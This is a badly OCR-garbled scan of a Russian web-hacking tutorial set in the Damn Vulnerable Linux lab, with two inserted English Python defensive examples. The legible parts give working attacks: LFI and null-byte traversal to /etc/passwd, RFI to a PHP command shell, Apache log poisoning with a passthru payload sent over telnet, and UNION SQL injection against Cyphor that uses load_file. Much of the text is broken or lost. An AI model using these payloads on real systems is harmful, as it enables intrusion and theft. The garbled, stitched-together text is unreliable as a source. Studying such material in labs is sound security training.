00. .............................................................................................................................

9
I. ..............................................................................................
0 1 .0 ....................................................................................................... 12
02. .......................................................................................................................16
II. -............................................................................................. 25
03. ..................................................................................................................26
04. -..................................................................................................................... 31
05. SQL- ................................................................................................................ 47
06. ............................................................................................... 59
07. SQL-.................................................................................................... 70
08. -................................................................................ 83
09. CRLF- .................................................................................................................. 86
III. ?..........................................................................................................87
0. .................................................................. 88
0. ............................................................................................ 94
. ..........................................................................................

102

0D. .............................................................................................. 109


0. .................................................................................... 118
0F. ................................................................................................ 122
10. ..........................................................

124

11. .................................................................................................. 126


12. ............................................................................................

128

13. IT-............................................................................... 131


1. *-........................................................................ 138
2. SQL- show.php Cyphor.............................

140

3. Cyphor.................................... 144
4. SQL-
C yphor.................................................................................... 150
5. SQL- MS SQL Jet ........................................... 152
6. nabopoll.php ........................ 155
7. SQL-
MS Access............................................................................................. 157
8.
instantCM S...........................................................................................

158

9. SQL-............................................... 161
10. ...............................................................................

166

00. ............................................................. .......................................

......... 9

............. %........................................... ............... ...... * ................... 9


. . . . . . ............ %........................................................................................... 9
..... .................................................................................. ....................10
I. , . , ........................ ....................... ..
01.

11

. * .................... ................................................ ................... . . 12

.................... ............... 12
-.............................. .
............................................................................ 14
02. ............* ...................... ....................................... ..............................

16

. -............................................................................. 25
03.

........................ . . . . ................... ..

26

04. - ................................ ........................ ............................ ............................ 31


-. . ........................................................................................... 31
-............... ......................................... . .................................... 35
- N aboPoll................................. p f !........... 40
- Apache .......... 41
........................... ....... ............................................... 44
............................................ ................................... . 44
......................................................................................45
05. SQL- ......................... ....................................................................................47
.................... . . . . ................ .........................53
-........................................................................................... ......... 54
SQL-.............................................................................................. 56
................................... .........................................58
06* ............................................. .............................................. 59
XSS .......................................... ..................................................59
........................................ .................................. 60
.................... ...................................................... 61
-, XSS ......................................................... 62
<script>........................................... 67

07. SQL-.............................................................................................70
MySQL @@version.................... 71
mysql.user ..............................................71
........................................................................................ 72
.................................................... 72
/ ............................................... 73
SQL- NaboPoll............. ................................................74
....................................................... 79
............................................. .............................................80
...... ................................................................ 81
08. -.................................. ....................................... 83
/proc/self/environ....................................... .................................83
Apache .................................................................................... 84
...................................................................................84
09. CRLF- ...........................................................................................................86
I I I . ?........................................................................................ 87
0. ............................................................88
0. ................................................................................... 94
. ................................................................................... 102
*-........................................................................ 102
LDAP- ..................................................................... 105
\5- ................................................................................................ 106
0D. ........................................... ............................................ 109
0. .......................................................................

118

0F. ......................................................................................... 122


10. ................................................... 124
11. ........................................................................................ .126
12. ............................................... ....................................128
13. - ...................................................................... 131
............................. 131
IC Q ..................................................................... 133
, ................................................ 135
1. *-.................................................................... 138
2. SQL- show.php Cyphor............................140
3. Cyphor................................ 144


,
. ( ,
, ),
- -,
.
, .
,
.
, , ,
,
.
Linux (
Windows), ,
Linux, .
,
( , , ,
, ). ,
, , ,
,
.
( ,
).


,
1995 1999
( , ,

10

**

* > \ * tie ,
^. , ,
. 1\
0* . v .
-00
( '00 nv\\ ).
.


; ' DVD-
Linux, Damn Vulnerable Linux BackTrack 4.
vmww ewoN ,
, 02.

' .
, ,
11 .
,
comp@piter.com ( , ).
!
-
http://www.piter.com,

01.
02.

. *nix
Unix- ( , AIX, HPUX, SunOS, Solaris, Linux, FreeBSD, OpenBSD, NetBSD - ).
Windows
Microsoft ,
Windows. , , ,
.

-
:
-? -
. , , ,
- .
- -,
. ,
, ,
, , ,
.
- , , ,
,
( ).
- ,
. , ,
-,
.
-:
( );
;

\3<v*V. ) ''

13

;
( covey auwku,
).
.

>

\;.^

. -
Hacked by . :^\*

. .). , , .
-
.
, ^ vs<v vc\
\
>.
( .)
. )}*'
. ,
<\ -
,
^ ^

.
& .<
^
. , se fc ^'rm
.
,

(
W indow s) ( *nix). xasxfi w&aset
, ,
.^ ;
, .
-
.
. - .'*' trrasv* tov.
( & |> i)
ca^'t

. . & ^.
, - \
, * .

, . *; .

- , .ty^ac: vov.yvv.*
, - wc'
. , W*V >iII
opranvLM
, to ? Vi
.

V .-

14

01.


, , IP . - (proxy),
,
( ). ,
. ,
, .
,
. (),
, -
. ,
-, .
-
, , ,
.
,
, . ,
- ftp-.
free proxy list
.
, IP - (, www.2ip.
ru), , , .
, ,
!
.
, SocksChain
Ufasoft,
.
.
(Virtual Private Network, VPN). ,
(
VPN ). VPN
.

. ,
,
,
. ,
. ru.
, www. hi demyass. com.
.
,

15

( ), .
* .
.
, ,
,
. (.gov)
( .mil) , (.edu).
( , )
( ). ,
.
,
.
. ,
(live-CD) .
.
( )
. , , ,
,
.
,
.
.

,
, ,
.

Linux, Damn Vulnerable Linux BackTrack 4.
( ) DVD.

. Damn Vulnerable Linux (


DVL) BackTrack 2.
DVL 1.5.
: www.damnvulnerablelinux.org.

(: ). DVL
(live CD),
, !
) ,
,
.
, , , .
. ? (
Windows), ,
(.1 .
,
.
VMware VirtualBox.
VMware , .
( ) www.vmware.com/
products/, www.vmware.com/download. VMware.

Fig. 02.1. VMware Player welcome screen (Welcome to VMware Player: Create a New Virtual Machine, Open a Virtual Machine)


, VMware Player ,


( ,
), ,
VMware Player .1, ,
,
' .
1. VMware Player. , -, 02.1
Create a New Virtual Machine (),
, . 02.2,
Installer disc image file (iso) Damn Vulnerable
Linux, Browse. C:\DamnVulnerableLinux1.5\
DVL_1.5_Infectious_Disease.iso.
Next.

Fig. 02.2. New Virtual Machine Wizard, step 1: Welcome to the New Virtual Machine Wizard (Install from: Installer disc / Installer disc image file (iso): C:\DamnVulnerableLinux1.5\DVL_1.5_Infectious_Disease.iso; "Could not detect which operating system is in this disc image"; I will install the operating system later)

3. , . 02.3,
Next.
4. (. 02.4)
. ,
DVL DamnVulnerableLinux,
. Next.

Fig. 02.3. New Virtual Machine Wizard, step 2: Select a Guest Operating System
Fig. 02.4. New Virtual Machine Wizard, step 3: Name the Virtual Machine (name and location of the virtual machine, Browse...)


. 02.5.
, , . 8 . DVL
2 , 8
(
). *
, 2 , Split virtual
disk into 2 GB files, .
, , 2 ,

. Next
Fig. 02.5. New Virtual Machine Wizard, step 4: Specify Disk Capacity (Maximum disk size (GB): 8.0; Recommended size for Other Linux 2.6.x kernel: 8 GB; Store virtual disk as a single file / Split virtual disk into 2 GB files: splitting the disk makes it easier to move the virtual machine to another computer)


, Finish ( 02.6).

512 , 250
Damn Vulnerable Linux .
Customize Hardware.
. 02.7. ,
(796 ).
2 ( ), ; ><
. , ,
- Auto
detect (). , , , '( ,
, . 02.0.111
Finish, .


Fig. 02.6. New Virtual Machine Wizard, step 5: Ready to Create Virtual Machine (Version: Workstation 6.5-7.0; Operating System: Other Linux 2.6.x kernel; Hard Disk: 8 GB, Split; Memory: 256 MB; Network Adapter: NAT; Other Devices: CD/DVD, Floppy, USB Controller, Sound Card; Customize Hardware...; Power on this virtual machine after creation)

Fig. 02.7. Hardware dialog, Memory (Memory for this virtual machine: 896 MB; Guest OS recommended minimum: 32 MB; Recommended memory: 256 MB; Maximum recommended memory: 796 MB, memory swapping may occur beyond this size; Maximum configurable memory: 32768 MB; New CD/DVD using file C:\Damn Vulnerable...; Floppy using drive A:; Network Adapter NAT; USB Controller Present; Sound Card and Display Auto detect)

.'..
. 02.8. Removable Devices (
), .
I Finished Installing ( *),
Linux
. ,
Ctrl, . , 6 (
Ctrl+G
).
, Ctrl+Alt (Ctrl Alt ).
Fig. 02.8. DVL booting in VMware Player (Other Linux 2.6.x kernel): the console prints "Welcome to Damn Vulnerable Linux", "Login as root, with password toor" (both lowercase) and hints such as startx (to run the X Window System) and xconf (to autoconfigure your graphics); the Finished Installing and Change buttons are in the status bar

root, Enter.
(password) toor ( root )
Enter. ,
:
bt ~ #


bt , # , .
# $.
Linux.
Linux , ,
Enter.
KDE startx
Enter. :
bt ~ # startx

, .
Linux, , Windows
( , Windows),
.
- ,
,
( Linux),
, .
Fig. 02.9. KDE desktop of Damn Vulnerable Linux (Infectious Disease) in VMware Player

,
. 02.9.
KDE.
Firefox ( )
. , Windows-.

( ),
(de). ,
,
.
,
.
(Ctrl+Alt),
VM Power Suspend.
.
VMware Player.
BackTrack 4,
, , ,
Linux Ubuntu, Linux,
I Finished Installing (
-).

II
-

03.
04.
05.
06.
07.
08.
09.


-
SQL-

SQL-
-
CRLF-

- - -,
. - .
.
. (bug) .
- -,
.
,
(, ).
,
, Linux- -. ,
DVL , http- (-
Apache). HTTPD (
). Konqueror (
Windows). Start HTTPD
. , - . ,
Konqueror , -.
( http ://) Location
Enter.
Board51,
- (http://localhost). (Firefox Konqueror)

http://localhost/webexploitation_package_02/board51/board.php
, , (. 03.1).
, ,
, ,
*nix-. Windows
(, D) D:\Inetpub\wwwroot\board51\.
, -
Apache ( - *-,

Fig. 03.1. Board51 (board.php) in the browser: PHP warnings from board.php (fopen: failed to open stream: Permission denied in /usr/local/apache/htdocs/webexploitation_package_02/board51/board.php on line 33; supplied argument is not a valid stream resource on lines 39 and 41) above the German board interface (letzter Eintrag 03 Oct 2002 05:10:13 von Admin; Nutzungshinweis, Download Board51)

Windows). , - ,
- (-) . ,
, (Internet Explorer, Opera,
Firefox etc.), ,
-. - -
(, ), -,
, . .
, Board51
, .
, , ,
. boarddata/data/user.idx
, , ICQ.
, ,
. ( . , ,

.)

http://localhost/webexploitation_package_02/board51/boarddata/data/user.idx

Fig. 03.2. The user.idx file of Board51

user.idx (Fig. 03.2).


, - . ([),
( ) bscxszzt -'^;
21232f297a57a5a743894a0e4a801fc3
MD5 (Message Digest 5).
,
( zzx l Kpo*se ,
-. moss - .

i ndex -php*ang=rus (. -j-j/. ? InsidePro. *. .
, CAFPC.-A@
jzm '
-g33-~~a -32 ,
(). <'-=; -;
21232f297a57a5a743894a0e4a801fc3 :

:<^5 - .
fwsbcxplitetion
*l. ^..
!- ^^
^
package_02/bGcrcc.L/ tiGcrc.
I ( .
(admin) ^
.
(Warning), EaHBdL :: ,
cpajses^ ? ? .
(. 031*4)- 11&- ^. _ ^
! . :. 2 >

Fig. 03.3. The hash lookup form on the InsidePro site (protected by a CAPTCHA)

Fig. 03.4. Board51 after logging in as Admin (Angemeldet als Admin, Besucher online: 1; Neues Forum, Konfiguration, Abmelden; Hinweis, Erste Nutzung; letzter Eintrag 03 Oct 2002 05:10:13 von Admin)

, IP - .
. , , .


IP - ,
. ,
TCP/IP, IP-, .
IP 4 IP- (
0 254), , :
192.168.2.11. () IP -, ,
1- 127.0.0.1.
, .
1 65 535.
, .
- , , .
, - 80, FTP 21.
, ,
, , . ,
, , 1-
, . ,
-, IP 80,
, -. -, ,
IP- ( , )
-.
.

, -,
include() , -
. ,
. (V/r . vndxide
[-]). (Local File Include,
LFI) (Remote File Include, RFI).
.
, ,
HTTP FTP .
, ,
. .

-

. :
http://[target]/index.php?page=./../etc/passwd%00

[target] ,
www.site.com. /etc/passwd.
:

. / ;

.. / , Unix- .


HTTP (null-byte).
. ,
,
. .php .txt.
: /etc/passwd.php, .
, .



index.php . , Damn Vulnerable Linux
- /usr/local/apache/htdocs/. ,
(
.. /) 4 , .
, htdocs,
. ,
-,
, ,
.
/usr/local/apache/htdocs/
-. ,
, -,
.
( Windows)
Damn Vulnerable Linux Tools Editors Kate,
Kate ( , ,
). Default Session (
, , , DVL ).
( ^!)):
<?
// the page name is taken straight from the query string
$page = ($_GET['page']);
// ".php" is appended, but a %00 in $page cuts the name off before it
include("./htdocs/$page.php");
?>

(-)?
. , , .
$,
, .
htdocs (
$)
.php. . ,
( ) . ,
, ,
. ( File Save)
/usr/local/apache/htdocs. ,
, Enter
. .
my.php , Save. 11
, .php.
. .
(Firefox Konqueror)
:
http://localhost/my.php?page=./../etc/passwd%00


localhost
( : www.site.com).
, . 04.1,

Fig. 04.1. The first attempt to include /etc/passwd through my.php fails: Warning: main(./htdocs/./../etc/passwd): failed to open stream: No such file or directory in /usr/local/apache/htdocs/my.php on line 3; Warning: main(): Failed opening './htdocs/./../etc/passwd' for inclusion (include_path='.:/usr/local/lib/php') in /usr/local/apache/htdocs/my.php on line 3

!
.. / ,
http://localhost/my.php?page=/etc/passwd%00
http://localhost/my.php?page=./../../../etc/passwd%00
,
/etc/passwd, . 04.2.
! !
/etc/passwd , :
. .
View View Document Source ( Konqueror)
View Page Source ( Firefox)
(. 04.3).

Fig. 04.2 (http://localhost/my.php?page=./../../../../../etc/passwd%00) and Fig. 04.3 (View Page Source in Konqueror) show the contents of /etc/passwd:

root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
postgres:x:1000:100::/home/postgres:

/etc/passwd? ,
() .
. (
root). root (
) 0 0.
. ,
/etc/shadow ( FreeBSD
: /etc/master.passwd). /etc/shadow,
, , ,
.
? , .
,


, /etc/shadow.
, .
/etc/shadow
root , root.
,
. , ,
,
( ). ,
Linux - /etc/shadow
.

http://localhost/my.php?page=./../etc/shadow%00
, ,
root, - Apache, ,
,
Permission denied ( , ).
/etc/shadow ,
.
00 (
)
http://localhost/my.php?page=./../../../../../etc/passwd%00
, . /etc/shadow, ,
? ?
-------------------------------------------------------------

. .

-
,
, ,
.

, *nix, .

http://[target]/inj.php?inc=http://narod.ru/cmd.txt&cmd=ls

cmd.txt
http://narod.ru. ls,
.


(File New)
:

<?
$page = ($_GET['page']);
// no check at all: the value is included verbatim, whether a local path or a URL
include("$page");
?>
-.
my.php
inj.php (File Save As) , my.php.
, i ncl ude htdocs
. php, ,
. ,
.
, (,
FTP). .

<pre>
<?php
// $cmd arrives from ?cmd= only because register_globals is on
print("<b>$cmd</b>\n");
system($cmd);
?>
</pre>
cmd.php , inj.php.
HTML <pre> </pre> ,
(
). print $cmd
,
. system() ,
$cmd, .
, ,
:
http://localhost/inj.php?page=http://localhost/cmd.php?cmd=ls
, - . 04.4.
ls,
.
, -
, .
inj.php cmd.php,
Parse error: , , ,
.
.

Fig. 04.4. Output of ls in the browser via inj.php (base, beef, cmd.php, index.php, info.php, inj.php, my.php, olate, phpmyadmin, unicornscan, webexploitation_package_01, webexploitation_package_02)

, ls *nix-.
, uname ( Unix-,
).
pwd (print working directory
) id ( ).
, nobody (
uid=99), nogroup (
gid=99). , ,
groups. , Linux-
- nobody.
dir, , ls,
, .
, ,
.
, .
, ( . shell ) *nix-,

(). *nix ,
Windows, CMD.exe. *nix-
bash sh.
, *nix- . Unix
(-), (--)


. , uname -
Unix-. ,
. , ls -l
,
( *nix
).
----------------------------------------------------------------------_

Linux Unix ,

- .

,
ls -al ls -la. -
. ,
.
? Linux $IFS,
().
ls$IFS-l . , ,
! . 04.5.
-:
<pre><? system($_GET['cmd']); ?></pre>
, + ,
ls -la ls+-la. .
. 04.5 .
(total). drwxr-xr-x? d
, (-).
, ,
, ,
:
(read);
w (write);
(execute).
:
-rw--w-- 1 bob csc532 70 Apr 23 20:10 file
drwx.....2 sam Al 2 May 01 12:01 directory

To
( , . 04.5
root, , , bob sam).
, .

Fig. 04.5. Output of ls$IFS-la in /usr/local/apache/htdocs through cmd.php (total 37; base, beef, cmd.php, cmd.pl, cmd.txt, index.php, info.php, inj.php, manual, my.php, olate, phpmyadmin, unicornscan, webexploitation_package_01, webexploitation_package_02, all owned by root)

() ,
. . 04.5 root (
).
, ,
. ,
. , , , abc
(d), root root:
drwxr-xr-- 10 root root 107 Jan 18 2009 abc
, (rwx),
, (-),
(--). , 18 2009
(Jan 18 2009).
ls -lad.
.
( root) chown
.
() chmod. ,
, ( 7) ,


( 5) (
):

chmod 765 - >


, ,

.
, , :
0

2 ;
3

5 ;
6

(, ).

( root)
, .
- . cat
, . ,
cat /etc/passwd /etc/passwd. ,
- : cat$IFS/etc/passwd
: cat+/etc/passwd.
*nix, *nix.
1.

-
NaboPoll
NaboPoll
( survey.inc.php, path) ,
( , , ) .
,
, :
http://localhost/webexploitation_package_02/nabopoll/survey.inc.php?path=http://localhost/cmd.php?cmd=ls%00
. 04.6.

Fig. 04.6. Result of ls through the NaboPoll include (survey.inc.php): the htdocs listing

-
Apache
(Vvvee , *
, () Apache. ,
Apache httpd-access.log httpd-error.log,
- (
| access, U\x ' , , error. 1).
DVL: access_log ,
/usr/local/apache/logs. ,
\^ kv, -,
, :
http://localhost/index.php?page=./../logs/access_log%00

access_log.
telnet 80 :
telnet 127.0.0.1 80
:

GET <pre><?passthru($_GET['cmd']);?></pre> HTTP/1.1


Enter 400 (. 04.7),


-, <pre><?passthru($_GET['cmd']); ?></pre>, access_log
:
error_log:
[error] [client 127.0.0.1] Invalid URI in request GET <pre><?passthru($_GET['cmd']);?></pre> HTTP/1.1

access_log:
127.0.0.1 - - [30/Jun/2010:13:00:40 +0200] "GET <pre><?passthru($_GET['cmd']);?></pre> HTTP/1.1

bt / # telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
GET <pre><?passthru($_GET['cmd']);?></pre> HTTP/1.1
HTTP/1.1 400 Bad Request
Date: Sun, 27 Jun 2010 19:46:58 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>400 Bad Request</TITLE>
</HEAD><BODY>
<H1>Bad Request</H1>
Your browser sent a request that this server could not understand.<P>
The request line contained invalid characters following the protocol string.<P>
</BODY></HTML>
Connection closed by foreign host.

Fig. 04.7. Planting code in the Apache logs via telnet

- , ,
,
, , .
, , accessjog,
.
, GET, .
- Referer User-Agent,
( !):
bt ~ # telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET / HTTP/1.1
Accept: */*
User-Agent: Lynx/2.8.5rel.1 libwww-FM/2.14
Host: 127.0.0.1
Connection: Close
Referer: http://127.0.0.1/<pre><?passthru($_GET['cmd']);?></pre>
I I Enter.
Referer, User-Agent.
:
http://localhost/index.php?page=./../logs/access_log%00&cmd=ls+-la
- +, ls -la.
.
access_log,
(. 04.8).
', error_log . ,
ftpd ( FTP),
, Apache, - ( ,

Fig. 04.8. The poisoned access_log included through index.php?page=./../logs/access_log%00&cmd=id;uname+-a;pwd;ls+-la: the logged requests are followed by the command output uid=99(nobody) gid=98(nobody) groups=98(nobody); Linux bt 2.6.20-BT-PwnSauce-NOSMP #3 Sat Feb 24 15:52:59 GMT 2007 i686; /usr/local/apache/htdocs; and the listing of htdocs

- ).
, , ,
txt, 1 . .
, .
. , .
- <pre><?passthru($_GET['cmd']);?></pre>, avatar.gif
, :
http://[target]/forum.php?page=./../smileys/avatar.gif%00&...

.
, avatar.gi f ,

- .


-
-. :
/logs/error.log
/logs/access.log
/logs/error_log
/logs/access_log
/var/log/error_log
/var/log/access_log
/var/log/error.log
/var/log/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/httpd/error.log
/var/log/httpd/access.log
/var/log/httpd/error_log
/var/log/httpd/access_log


,

(switch case). -:

<?php
global $page;
switch ($page)
{
    case '':
        include("pages/main.php");
        break;
    case 'index':
        include("pages/main.php");
        break;
    case 'page1':
        include("pages/page1.php");
        break;
    case 'page2':
        include("pages/page2.php");
        break;
    default:
        include("pages/error.php");
        break;
}
?>


str_replace().
, php.ini
:
allow_url_include = Off
allow_url_fopen = Off
register_globals = Off
magic_quotes_gpc = On
safe_mode = On

//
// fopen
//
// " " (00)
// safe_mode.
/ / /etc/passwd


P H P -,
:
<?php
function stripslashes_for_array(&$array)
{
    reset($array);
    while (list($key, $val) = each($array))
    {
        if (is_string($val)) $array[$key] = stripslashes($val);
        elseif (is_array($val)) $array[$key] = stripslashes_for_array($val);
    }
    return $array;
}
if (!get_magic_quotes_gpc())
{
    stripslashes_for_array($_POST);
    stripslashes_for_array($_GET);
}
if (isset($_GET['file'])) $file = $_GET['file'];
else
{
    if (isset($_POST['file'])) $file = $_POST['file'];
    else $file = '';
}
// the filter: '/' and '.' are simply removed from the value
$file = str_replace('/', '', $file);
$file = str_replace('.', '', $file);
if (!file_exists("include/" . $file . '.php') || $file == 'index')
{
    $file = 'news';
}
include("include/" . $file . '.php');
?>
stripslashes(), . ,
. ('/'
'.') str_replace(). (
file_exists()), $file='news'.
.
- ,
-, , .
.
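The two defensive patterns above (the switch/case whitelist and the str_replace-based filter) are shown here together in one added example that is not from the book. The book's character-stripping filter is reproduced only as book_style_filter(), to contrast it with a whitelist check plus canonical-path confirmation; ALLOWED_PAGES and every function name are this example's own assumptions.

```python
"""Whitelist-based page selection, the safe counterpart of the
include-by-parameter code shown above (added example, not from the book)."""
import os
import re
from typing import Optional

# Constructed whitelist: the pages the application really has (assumption).
ALLOWED_PAGES = {"main", "index", "page1", "page2", "news"}
_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")


def book_style_filter(value: str) -> str:
    """What the book's str_replace('/', ...) / str_replace('.', ...) pair does:
    it strips characters but never decides whether the name is legitimate."""
    return value.replace("/", "").replace(".", "")


def validate_page_name(value: Optional[str]) -> Optional[str]:
    """Return the page name if it is a plain whitelisted identifier, else None.
    Null bytes (the %00 trick), traversal, absolute paths and URLs all fail
    the character class before the whitelist is even consulted."""
    if value is None or "\x00" in value:
        return None
    if not _NAME_RE.fullmatch(value):
        return None
    return value if value in ALLOWED_PAGES else None


def resolve_include(base_dir: str, value: Optional[str]) -> Optional[str]:
    """Defence in depth: map the validated name to a file and confirm the
    canonical path is still inside base_dir."""
    name = validate_page_name(value)
    if name is None:
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name + ".php"))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


if __name__ == "__main__":
    for candidate in ("page1", "../../logs/access_log\x00", "/proc/self/environ"):
        print(repr(candidate), "->", validate_page_name(candidate))
```

The whitelist is the real control; the realpath check only catches mistakes in how the whitelist is later mapped to files (for example a symlink under the include directory). Note that the book's filter turns `../../logs/access_log` into `logsaccess_log`, a name that merely fails to exist, whereas the whitelist rejects it outright.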

SQL-

SQL- Cypher.
http://localhost/webexploitation_package_02/cyphor.
Fig. 05.1.

Guest access granted. You have to register if you want to post messages.

Fig. 05.1. Cyphor (forum main page: Login, Search, Forums)

newmsg.php. .
exit.
# (Fig. 05.2)
. .
. ,
Cyphor
.
, , newmsg.php SQL fid ( SQL-

<?php
// (file header partly unreadable: author, "erstellt", "Parameter", "Oktober 2000")
// ID of the message being replied to
// fid: forum ID
include("include/db_mysql.php");
include("include/settings.php");
include("include/global.php");
/* Include the file */
$lang_file = "lang/" . $language . ".php";
include($lang_file);
open_session();
if ($login && $pass)
    login($login, $pass);
else
    exit_page_with_msg($err_not_logged_in, ..., "index.php?...login");

Fig. 05.2. newmsg.php

(SQL-injection)? SQL,
. SQL (Structured Query Language
) . SELECT
. , SELECT id, password
FROM users id password users, SELECT * FROM
users users.
, (,
). SQL-, INSERT (
) UPDATE (, ),
, .
UNION . :
SELECT fid, title FROM forums UNION SELECT nick, password FROM users

,
. , UNION
,
. , ,
SELECT, .

.
(1, 2, 3...), (
), (null)
SQL-. .
( FROM),
, cyphor_users,

nick () password ().

:
union select 1 from cyphor_users

:
http://localhost/webexploitation_package_02/cyphor/newmsg.php?fid=-1 union select 1 from cyphor_users

,
, . SQL,
( ) MySQL,
/* ( --),
. . 05.3.

Location: http://localhost/webexploitation_package_02/cyphor/newmsg.php?fid=1%20union%20select%201%20from%20cyphor_users

Not logged in!
MySQL Error: Invalid SQL: SELECT * FROM cyphor_forums WHERE id=1 union select 1 from cyphor_users
Database error: 1222 (The used SELECT statements have a different number of columns)
Please contact us (admin@domain.ext) and specify the exact error message.
Session halted.

Fig. 05.3. SQL injection, newmsg.php

, SQL
( ), ,
.
,
(%20). ,
(+) /**/,
.
, .
(union select 1,2,3,4 from cyphor_users),
(Fig. 05.4). ,
, .
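A detection-side counterpart to the UNION probing walked through above, added here as an example that is not from the book: it scans access-log query strings, normalises the encodings the text mentions (%20, +, and /**/ standing in for spaces), and tags the column-counting phase (union select 1,2,3,4 ...), information functions, long hex literals used to smuggle strings, and INTO OUTFILE. The log lines are constructed; every name is this example's own.

```python
"""Tag UNION-based SQL injection attempts in web-server access-log lines
(added example, not from the book)."""
import re
from urllib.parse import unquote_plus

# Constructed sample in Apache common-log format (one request per line).
SAMPLE_LOG = """\
10.0.0.5 - - [27/Jun/2010:19:27:41 +0000] "GET /cyphor/newmsg.php?fid=1 HTTP/1.1" 200 284
10.0.0.5 - - [27/Jun/2010:19:27:53 +0000] "GET /cyphor/newmsg.php?fid=-1%20union%20select%201%20from%20cyphor_users HTTP/1.1" 200 1439
10.0.0.5 - - [27/Jun/2010:19:28:07 +0000] "GET /cyphor/newmsg.php?fid=-1+union+select+1,2,3,4+from+cyphor_users HTTP/1.1" 200 1439
10.0.0.5 - - [27/Jun/2010:19:28:30 +0000] "GET /cyphor/newmsg.php?fid=-1/**/union/**/select/**/1,concat_ws(0x3a,version(),user(),database()),3,4 HTTP/1.1" 200 1510
10.0.0.5 - - [27/Jun/2010:19:29:04 +0000] "GET /cyphor/showmsg.php?fid=-1+union+select+1,concat_ws(0x3a,nick,password),3,4+from+cyphor_users+into+outfile+%27/usr/local/apache/htdocs/cyphor/user.txt%27 HTTP/1.1" 200 0
192.168.1.9 - - [27/Jun/2010:19:30:00 +0000] "GET /cyphor/newmsg.php?fid=2 HTTP/1.1" 200 284
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

UNION_RE = re.compile(r"\bunion\s+(all\s+)?select\b")
# "union select 1,2,3,4" or nulls only: the column-count phase.
COLUMN_COUNT_RE = re.compile(r"\bunion\s+(all\s+)?select\s+((\d+|null)\s*,\s*)*(\d+|null)\b")
INFO_FUNC_RE = re.compile(r"\b(version|user|database|load_file|concat_ws|group_concat)\s*\(")
HEX_RE = re.compile(r"\b0x[0-9a-f]{4,}\b")
OUTFILE_RE = re.compile(r"\binto\s+(out|dump)file\b")


def normalise(query: str) -> str:
    """URL-decode (+ and %xx), replace /**/ comments by spaces, lower-case."""
    q = unquote_plus(query)
    q = re.sub(r"/\*.*?\*/", " ", q)
    return re.sub(r"\s+", " ", q).strip().lower()


def classify(path: str) -> list:
    """Return the list of tags that apply to one request path."""
    q = normalise(path.partition("?")[2])
    tags = []
    if UNION_RE.search(q):
        tags.append("union-select")
        if COLUMN_COUNT_RE.search(q) and not INFO_FUNC_RE.search(q):
            tags.append("column-count-probe")
    if INFO_FUNC_RE.search(q):
        tags.append("info-function")
    if HEX_RE.search(q):
        tags.append("hex-literal")
    if OUTFILE_RE.search(q):
        tags.append("file-write")
    return tags


def scan(log_text: str) -> list:
    """(ip, script, tags) for every flagged line, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m.group("path"))
        if tags:
            findings.append((m.group("ip"), m.group("path").split("?")[0], tags))
    return findings


if __name__ == "__main__":
    for ip, script, tags in scan(SAMPLE_LOG):
        print(ip, script, ",".join(tags))
```

The file-write tag is the one to page on: INTO OUTFILE only works when the MySQL account has FILE privilege and the web root is writable, so a hit means both the injection and the deployment problem the book describes are present.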

Location: http://localhost/webexploitation_package_02/cyphor/newmsg.php?fid=1%20union%20select%201,2,3,4%20from%20cyphor_users

Not logged in!
New message in forum 2
Line breaks are processed, you don't need to force them through <BR>. HTML tags will be filtered! Links will automatically be generated.
From: / Subject: (form fields)

Fig. 05.4. UNION SELECT

2.
nick ( ,
Cyphor). . 05.5
( admin ).

Location: http://localhost/webexploitation_package_02/cyphor/newmsg.php?fid=1%20union%20select%201,nick,3,4%20from%20cyphor_users

Not logged in!
New message in forum admin
Line breaks are processed, you don't need to force them through <BR>. HTML tags will be filtered! Links will automatically be generated.

Fig. 05.5. (admin)

2 password
admin (Fig. 05.6).
Cyphor crypt(),
(

Not logged in!
New message in forum ad4ERM.YJ7j9A
Line breaks are processed, you don't need to force them through <BR>. HTML tags will be filtered! Links will automatically be generated.

Fig. 05.6. admin

).
, ,
Cyphor ,
8 , ,
. ,
DES,
John The Ripper (. ). , Cy
phor ( ),
(. 3).
M ySQL ( ),
M ySQL . , ,
version(), user() database().
concat_ws:
concat_ws(0x3a,version(),user(),database())

().
:
5.0.24:root@localhost:cyphor

concat, :
concat(name,0x3a,id)
,
group_concat, :
group_concat(password)
Cyphor,
, ( ).

/etc/passwd.
MySQL load_file('/etc/passwd').
( ),
:
load_file(0x2f6574632f706173737764)
,
(Fig. 05.7).

Location: http://localhost/webexploitation_package_02/cyphor/newmsg.php?fid=1%20union%20select%201,load_file(0x2f6574632f706173737764),3,4%20from%20cyphor_users

Not logged in!
